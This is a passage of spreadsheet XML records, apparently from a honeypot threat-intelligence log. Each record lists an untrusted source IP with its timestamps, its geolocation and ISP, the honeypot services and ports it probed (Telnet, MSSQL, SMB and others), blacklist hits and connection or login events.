    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:9fd3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1649"/>
    <x v="1649"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T14:38:10"/>
    <d v="2024-01-06T12:41:00"/>
    <d v="2025-04-15T14:38:10"/>
    <n v="239"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H24&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;12952&amp;&amp;1433&amp;&amp;445&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Selatan"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.22089"/>
    <s v="106.832"/>
    <s v="138842"/>
    <s v="PT Internetwork Komunikasi Indonesia"/>
    <s v="PT Internetwork Komunikasi Indonesia"/>
    <s v="business"/>
    <s v="Internetwork"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.155.106.253,52764)}&amp;&amp;{Data_SMB:Incoming connection (103.155.106.253,53255)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.155.106.253,63170)}&amp;&amp;{Data_SMB:Incoming connection (103.155.106.253,63850)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:679b:6afd"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1650"/>
    <x v="1650"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T14:38:09"/>
    <d v="2025-04-15T14:37:16"/>
    <d v="2025-04-15T14:38:09"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Konkan Division"/>
    <s v="Mumbai (Rajan Pada)"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.1797"/>
    <s v="72.8354"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="cellular"/>
    <s v="Bharti Airtel Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6ee2:25e4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1651"/>
    <x v="1651"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T14:36:12"/>
    <d v="2023-07-26T18:14:43"/>
    <d v="2025-04-15T14:36:12"/>
    <n v="1279"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_HTTP_H30&amp;&amp;SMA-LAB_IPP_H35&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_HTTPS_H25&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_SSH_H25&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;55221&amp;&amp;80&amp;&amp;631&amp;&amp;389&amp;&amp;443&amp;&amp;1080&amp;&amp;22&amp;&amp;44195&amp;&amp;445&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.20309"/>
    <s v="106.845"/>
    <s v="131111"/>
    <s v="PT Mora Telematika Indonesia"/>
    <s v="MORATELINDONAP"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.154.135.66,52506)}&amp;&amp;{Data_SMB:Incoming connection (103.154.135.66,52973)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.154.135.66,58279)}&amp;&amp;{Data_SMB:Incoming connection (103.154.135.66,58297)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.154.135.66,58720)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.154.135.66,63636)}&amp;&amp;{Data_SMB:Incoming connection (103.154.135.66,50229)}&amp;&amp;{Data_SMB:Incoming connection (103.154.135.66,50828)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:679a:8742"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1652"/>
    <x v="1652"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T14:34:54"/>
    <d v="2025-04-15T14:34:54"/>
    <d v="2025-04-15T14:34:54"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b63c:e6e3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1653"/>
    <x v="1653"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T14:16:19"/>
    <d v="2025-04-15T04:12:35"/>
    <d v="2025-04-15T14:16:19"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="NA"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4547"/>
    <s v="30.5238"/>
    <s v="34136"/>
    <s v="LLC Universalna Merezheva Kompaniya"/>
    <s v="DOMONET by WNET"/>
    <s v="residential"/>
    <s v="Wnet LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d46e:8a1a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1654"/>
    <x v="1654"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T14:14:50"/>
    <d v="2025-04-15T06:20:20"/>
    <d v="2025-04-15T14:14:50"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="74"/>
    <s v="Bartın"/>
    <s v="Bartın Merkez"/>
    <s v="Bartın"/>
    <s v="751057"/>
    <s v="NA"/>
    <s v="41.6376"/>
    <s v="32.3338"/>
    <s v="47331"/>
    <s v="TTNet A.S."/>
    <s v="TurkTelecom"/>
    <s v="residential"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="2004-09-20"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:556d:d352"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1655"/>
    <x v="1655"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T14:11:37"/>
    <d v="2025-04-14T13:34:43"/>
    <d v="2025-04-15T14:11:37"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Jakarta"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.20941"/>
    <s v="106.821"/>
    <s v="38482"/>
    <s v="BIZNET"/>
    <s v="BIZNET"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:704e:8752"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1656"/>
    <x v="1656"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T14:00:52"/>
    <d v="2025-04-15T14:00:52"/>
    <d v="2025-04-15T14:00:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Greater London"/>
    <s v="London"/>
    <s v="2643743"/>
    <s v="W1B"/>
    <s v="51.5072"/>
    <s v="-0.127586"/>
    <s v="8220"/>
    <s v="COLT"/>
    <s v="COLT Technology Services Group Limited"/>
    <s v="corporate"/>
    <s v="MINDBODY, Inc."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:50a9:44cb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1657"/>
    <x v="1657"/>
    <s v="175.101.130.101.static.excellmedia.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T13:59:27"/>
    <d v="2024-03-23T10:44:40"/>
    <d v="2025-04-15T13:59:27"/>
    <n v="285"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_SSH_H43&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_HTTP_H26&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1080&amp;&amp;5900&amp;&amp;9100&amp;&amp;22&amp;&amp;389&amp;&amp;80&amp;&amp;28879&amp;&amp;49276&amp;&amp;3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AP"/>
    <s v="Andhra Pradesh"/>
    <s v="Srikakulam"/>
    <s v="Narasannapeta"/>
    <s v="1261853"/>
    <s v="NA"/>
    <s v="18.4143"/>
    <s v="84.0446"/>
    <s v="17754"/>
    <s v="Excellmedia"/>
    <s v="ExcellMedia Pvt Ltd"/>
    <s v="business"/>
    <s v="Excell Media Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:af65:8265"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1658"/>
    <x v="1658"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T13:38:49"/>
    <d v="2024-07-04T05:24:00"/>
    <d v="2025-04-15T13:38:49"/>
    <n v="31"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;2600&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Faridabad"/>
    <s v="Faridabad (Nehru Ground)"/>
    <s v="1271951"/>
    <s v="121001"/>
    <s v="28.3905"/>
    <s v="77.3052"/>
    <s v="133647"/>
    <s v="ELXIRE DATA SERVICES PVT. LTD."/>
    <s v="Elxire Data Services Pvt. Ltd."/>
    <s v="business"/>
    <s v="Elxireitsol"/>
    <s v="2015-04-30"/>
    <s v="ELXIREITSOL"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d74:4536"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1659"/>
    <x v="1659"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T13:38:35"/>
    <d v="2025-04-15T13:38:35"/>
    <d v="2025-04-15T13:38:35"/>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6:c67f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1660"/>
    <x v="1660"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T13:35:21"/>
    <d v="2025-04-15T13:35:21"/>
    <d v="2025-04-15T13:35:21"/>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7:5019"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1661"/>
    <x v="1661"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T13:14:46"/>
    <d v="2025-04-15T13:11:13"/>
    <d v="2025-04-15T13:14:46"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Medchal Malkajgiri"/>
    <s v="Malkajgiri"/>
    <s v="7302828"/>
    <s v="NA"/>
    <s v="17.4478"/>
    <s v="78.5263"/>
    <s v="55577"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="ACT Fibernet"/>
    <s v="residential"/>
    <s v="Beam Telecom Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b753:efa3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1662"/>
    <x v="1662"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T13:02:45"/>
    <d v="2023-12-26T17:33:44"/>
    <d v="2025-04-15T13:02:45"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="9730&amp;&amp;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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="None"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c5:50f2"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1663"/>
    <x v="1663"/>
    <s v="NA&amp;&amp;210006088094.ctinets.com"/>
    <x v="0"/>
    <d v="2025-04-15T12:48:07"/>
    <d v="2025-04-15T10:10:03"/>
    <d v="2025-04-15T12:48:07"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NKT"/>
    <s v="Kwai Tsing"/>
    <s v="NA"/>
    <s v="Kwai Chung"/>
    <s v="1819595"/>
    <s v="NA"/>
    <s v="22.3702"/>
    <s v="114.13"/>
    <s v="9269"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="residential"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="2001-10-08"/>
    <s v="HKBN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1998-06-01 04:00:00"/>
    <s v="2027-05-31 04:00:00"/>
    <s v="2022-04-28 06:31:12"/>
    <s v="['NS1O.CTIHK.COM', 'NS2O.CTIHK.COM']"/>
    <s v="Network Solutions, LLC"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="22"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:d206:585e"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1664"/>
    <x v="1664"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T12:41:44"/>
    <d v="2025-04-15T12:40:41"/>
    <d v="2025-04-15T12:41:44"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="NA"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.21462"/>
    <s v="106.845"/>
    <s v="7713"/>
    <s v="Telekomunikasi Indonesia (PT)"/>
    <s v="PT. TELKOM INDONESIA"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2009-10-20"/>
    <s v="TLKM_BB_INF_180_242"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
